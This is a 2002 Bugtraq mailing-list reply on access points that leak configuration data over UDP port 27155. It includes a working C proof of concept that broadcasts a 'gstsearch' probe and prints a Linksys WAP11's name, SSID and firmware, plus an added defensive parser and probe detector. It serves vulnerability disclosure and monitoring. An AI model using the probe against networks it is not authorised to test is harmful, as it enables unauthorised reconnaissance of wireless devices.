[27776] in bugtraq
Re: Accesspoints disclose wep keys, password and mac filter (fwd)
daemon@ATHENA.MIT.EDU (Thomas Sarlandie)
Fri Nov 8 22:59:48 2002
Message-ID: <3DC7D487.4030100@altern.org>
Date: Tue, 05 Nov 2002 15:24:07 +0100
From: Thomas Sarlandie <sarfata@altern.org>
MIME-Version: 1.0
To: Tom Knienieder <knienieder@khamsin.ch>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Hi,
Linksys WAP11-V2.2 seems to be vulnerable in a different way. It only
returns AP's name, SSID and firmware version. Except for firmware
version, those are not private information.
Quickly patched proof of concept:
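#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>

/* Layout of the reply, as observed on the WAP11-V2.2 */
typedef struct {
    char type[28];
    char blank1[8];
    char apname[32];
    char firmware[6];
    char blank2[11];
    char ssid[32];
}
__attribute__ ((packed)) answer;

int main()
{
    char rcvbuffer[1024];
    struct sockaddr_in sin;
    answer* ans = (answer *)rcvbuffer;
    int sd, ret, val;

    /* Destination: limited broadcast, UDP port 27155 */
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr("255.255.255.255");
    sin.sin_port = htons(27155);

    sd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sd < 0)
    {
        perror("socket");
        exit(1);
    }

    /* Broadcast must be enabled explicitly on the socket */
    val = 1;
    ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
    if (ret < 0)
    {
        perror("setsockopt");
        exit(1);
    }

    ret = sendto(sd, "gstsearch", 9, 0, (struct sockaddr *)&sin, sizeof(sin));
    if (ret < 0)
    {
        perror("sendto");
        exit(1);
    }

    /* Zero the buffer so a short reply never leaves stale bytes in the fields */
    memset(rcvbuffer, 0, sizeof(rcvbuffer));
    ret = read(sd, rcvbuffer, sizeof(rcvbuffer));
    if (ret > 0)
    {
        /* Fields are fixed width and may lack a NUL, so bound each print */
        printf("Type : %.*s\n", (int)sizeof(ans->type), ans->type);
        printf("Announced Name : %.*s\n", (int)sizeof(ans->apname), ans->apname);
        printf("Firmware version : %.*s\n", (int)sizeof(ans->firmware), ans->firmware);
        printf("SSID : %.*s\n", (int)sizeof(ans->ssid), ans->ssid);
    }
    else
        perror("read");

    close(sd);
    return 0;
}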
thomas
>KHAMSIN Security News
>KSN Reference: 2002-11-01 0001 ULO
>---------------------------------------------------------------------------
>
>Title
>-----
> Accesspoints disclose wep keys, password and mac filter
>
>Date
>----
> 2002-11-01
>
>
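Added example, not part of the original post: a bounds-checked parser for the reply layout used in the proof of concept, plus a matcher for the "gstsearch" probe that a monitoring sensor could apply to captured UDP payloads. The names is_gst_probe, parse_gst_reply and ap_info and the sample packet in main() are constructed for illustration; the port, probe string and field offsets are taken from the proof of concept above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define GST_PORT      27155        /* UDP port used by the PoC above */
#define GST_PROBE     "gstsearch"  /* probe payload used by the PoC above */
#define GST_REPLY_LEN 117          /* 28 + 8 + 32 + 6 + 11 + 32 bytes */

typedef struct {                   /* hypothetical output type, +1 byte per field for NUL */
    char type[29], apname[33], firmware[7], ssid[33];
} ap_info;

/* Returns 1 if a UDP payload sent to GST_PORT starts with the probe string. */
int is_gst_probe(uint16_t dport, const uint8_t *p, size_t len)
{
    size_t n = sizeof(GST_PROBE) - 1;
    return dport == GST_PORT && len >= n && memcmp(p, GST_PROBE, n) == 0;
}

/* Copies one fixed-width field and forces NUL termination. */
static void field(char *dst, const uint8_t *src, size_t width)
{
    memcpy(dst, src, width);
    dst[width] = '\0';
}

/* Parses a reply; returns 0 on success, -1 if the datagram is too short. */
int parse_gst_reply(const uint8_t *p, size_t len, ap_info *out)
{
    if (len < GST_REPLY_LEN)
        return -1;
    field(out->type,     p,      28);
    field(out->apname,   p + 36, 32);
    field(out->firmware, p + 68, 6);
    field(out->ssid,     p + 85, 32);
    return 0;
}

int main(void)
{
    uint8_t pkt[GST_REPLY_LEN]; ap_info info;
    memset(pkt, 'A', sizeof pkt);        /* constructed reply with no NUL bytes */
    memcpy(pkt + 36, "lab-ap", 7);       /* constructed AP name */
    memcpy(pkt + 85, "lab-ssid", 9);     /* constructed SSID */
    if (parse_gst_reply(pkt, sizeof pkt, &info) == 0)
        printf("name=%s ssid=%s fw=%s\n", info.apname, info.ssid, info.firmware);
    return 0;
}
```

Any reply that parses successfully on a network means the access point answers unauthenticated discovery broadcasts and is disclosing the fields shown.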